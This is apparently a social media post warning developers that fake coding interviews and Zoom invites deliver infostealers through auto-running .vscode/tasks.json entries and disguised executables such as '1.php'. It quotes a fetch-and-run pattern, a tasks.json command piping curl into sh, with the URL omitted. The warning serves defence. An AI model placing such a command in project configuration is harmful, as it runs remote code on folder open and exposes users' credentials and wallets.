@bytebot

Mitsukeru coded - warning for you to beware of some scams around coding interviews and Zoom calls. If you're getting an interview, beware that you can get some high risk infostealers loaded automatically inside of .vscode/tasks.json. It can literally be as simple as: "command": curl https:// | sh" So you are rooted the moment you open up VS Code... which is nuts. And this can affect Window, macOS and Linux. This is in fact how a Farcaster user got hacked, wallet compromised, token screwed. We covered quarantine in Mitsukeru sometime ago https://farcaster.xyz/bytebot/0xdcb2379d In addition, sometimes you get this Zoom call invite... check your OneDrive for files like "1.php". > file 1.php > 1.php: PE32 executable (GUI) Intel 80386, for MS Windows This is how they root you. And once they've rooted you, you really should be taking the machine off the Internet - they can do wake on LAN, etc. once the backdoor is running. So all this is in addition to malicious VS Code extensions in the marketplace. I am not singling out VS Code either - others get affected too. I have made plenty of casts about the fake Zoom calls (but again, not limited to Zoom - Teams, etc. are just as problematic). Overall, all this is here to social engineer you to installing something, that eventually just steals all your useful credentials. Got to stop that in the tracks, at multiple layers.

1 reply

2 recasts

8 reactions